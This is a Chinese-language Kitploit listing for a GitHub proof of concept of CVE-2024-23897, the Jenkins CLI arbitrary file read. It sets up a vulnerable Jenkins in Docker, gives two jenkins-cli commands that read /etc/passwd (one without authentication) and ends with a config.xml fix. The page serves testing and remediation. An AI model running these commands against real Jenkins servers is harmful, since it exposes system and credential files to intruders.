Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — 在这个 git 上,你可以找到关于 CVE-2024-23897 的所有信息。 | Kitploit
工具/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

在这个 git 上,你可以找到关于 CVE-2024-23897 的所有信息。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
422年前尚未审核
分享

PoC-jenkins-rce_CVE-2024-23897.

在此仓库中,你可以找到关于 CVE-2024-23897 的所有信息。

Jenkins 标志

介绍

此问题被分配了 CVE 标识符 CVE-2024-23897,被描述为一种通过内置命令行接口实现的任意文件读取漏洞。该命令解析器具有一个特性,可以将参数中的 @ 字符后跟文件路径替换为该文件的内容(expandAtFiles)。此特性默认启用,并且 Jenkins 2.441 及更早版本、LTS 2.426.2 及更早版本未禁用它。

PoC

对于此 PoC,我使用 Docker 安装了 Jenkins 2.426.2 来测试该漏洞的利用。

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

在创建用户和密码后,我在攻击机上下载了 Jenkins CLI 客户端(jenkins-cli.jar)。

屏幕截图1

然后,我编写了用于利用的命令。 在此命令中,我们需要拥有 Jenkins 用户的凭据。

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
屏幕截图2

另一个命令允许在没有身份验证的情况下显示文件的前几行。

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
屏幕截图3

修复漏洞

要应对此漏洞,你需要导航到名为 config.xml 的 Jenkins 配置文件中(在我的案例中,它位于 Docker 容器内,因此我切换到容器的 shell 模式)。

屏幕截图4
并添加以下行:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

然后重启 Jenkins:

root@kitploit:~
service jenkins restart
下载工具